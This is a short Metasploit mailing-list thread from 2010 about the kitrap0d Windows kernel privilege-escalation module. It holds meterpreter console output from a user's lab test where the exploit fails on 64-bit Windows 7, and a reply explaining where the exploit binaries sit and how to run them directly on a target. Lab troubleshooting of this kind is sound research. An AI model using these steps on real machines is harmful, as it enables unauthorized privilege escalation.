Metasploit mailing list archives

Re: Kitrap0d question


From: <jeffs () speakeasy net>
Date: Fri, 29 Jan 2010 15:03:02 EST


I cannot find kitrap0d in the exploits directory.

Is it part of the standard dev trunk?

msf > version
Framework: 3.3-dev.7050
Console  : 3.3-dev.7100



try running the executable directly on that box

the binaries are located in

/metasploit/data/exploits/kitrap0d

just copy the two files to a usb stick and execute on the windows box.



It works only on x86 systems as far as I know....



Pavel



On Thu, Jan 28, 2010 at 11:58 PM, igor ransack <igor.ransack () gmail com> wrote:

Hi again rapid7, as seen on HD's blog, the following video is a fine example

:: http://vimeo.com/9028433



After watching it, i decided to build a lab around this new module in order

to understand it a bit better.



Here is the output ::



meterpreter > sysinfo

Computer: SERVEUR

OS : Windows 7 (Build 7600, ).

Arch : x64 (Current Process is WOW64)

Language: fr_FR

meterpreter > run kitrap0d

[*] Currently running as Serveur\Xavier



[*] Loading the vdmallowed executable and DLL from the local system...

[*] Uploading vdmallowed to

C:\Users\Xavier\AppData\Local\Temp\lKiNbiNIxRfeB.exe...

[*] Uploading vdmallowed to

C:\Users\Xavier\AppData\Local\Temp\vdmexploit.dll...

[*] Escalating our process (PID:3128)...



--------------------------------------------------

Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0

exploit

-------------------------------------------- taviso () sdf lonestar org ---



[?] GetVersionEx() => 6.1

[?] NtQuerySystemInformation() => @00000000

[*] Deleting files...

[*] Now running as Serveur\Xavier

meterpreter >



The only thing that comes to mind is the fact the OS is french but i doubt

then again that would make very little sense at the kernel level...

Also, I assume this exploit would not work under a 64 bit os ?

I can reproduce this on a clean setup.

Any info is appreciated.







_______________________________________________

https://mail.metasploit.com/mailman/listinfo/framework









_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: